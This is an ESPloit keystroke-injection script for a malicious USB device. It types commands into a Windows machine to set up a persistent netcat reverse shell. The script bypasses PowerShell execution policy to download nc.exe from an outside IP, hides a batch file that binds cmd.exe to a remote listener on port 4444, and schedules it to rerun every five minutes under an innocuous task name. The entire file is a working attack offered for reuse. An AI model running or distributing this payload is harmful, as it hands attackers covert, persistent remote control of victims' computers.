Rem:Generated by Dckuino.js by NURRL
Rem:Modified for use with ESPloit by Corey Harding
Rem:-----
Rem:[Persistent netcat reverse shell that runs in the background every 5 minutes.]
Rem:[replace [IP] with your listening IP]
Rem:[replace [PORT] with a port of your choice]
Rem:[opens command window]
Press:131+114
CustomDelay:300
Print:cmd
Press:176
CustomDelay:100
Print:mode con: cols=15 lines=1
Press:176
CustomDelay:100
Rem:[downloads netcat and saves it as a.exe in the folder C:\System]
Print:cd / & mkdir System & cd System & echo (wget 'http://172.19.4.80/nc.exe' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
Press:176
CustomDelay:1000
Rem:[creates start.bat which triggers the reverse shell]
Print:echo START /MIN a.exe 172.19.4.80 4444 -e cmd.exe -d ^& exit > start.bat
Press:176
CustomDelay:100
Rem:[creates three lines of commands in a script file telling the start.bat file to run in the background]
Print:echo Set WshShell = CreateObject(\"WScript.Shell\") > c.vbs
Press:176
CustomDelay:100
Print:echo WshShell.Run chr(34) ^& \"C:/System/start.bat\" ^& Chr(34), 0 >> c.vbs
Press:176
CustomDelay:50
Print:echo Set WshShell = Nothing >> c.vbs
Press:176
CustomDelay:50
Rem:[schedules the script file to run every 5 minutes (change the number 5 to a different time if you need)]
Print:schtasks /create /tn TaskSystem /tr C:/System/c.vbs /sc minute /mo 5
Press:176
CustomDelay:75
Rem:[runs start.bat and closes the command window]
Print:start.bat & exit
Press:176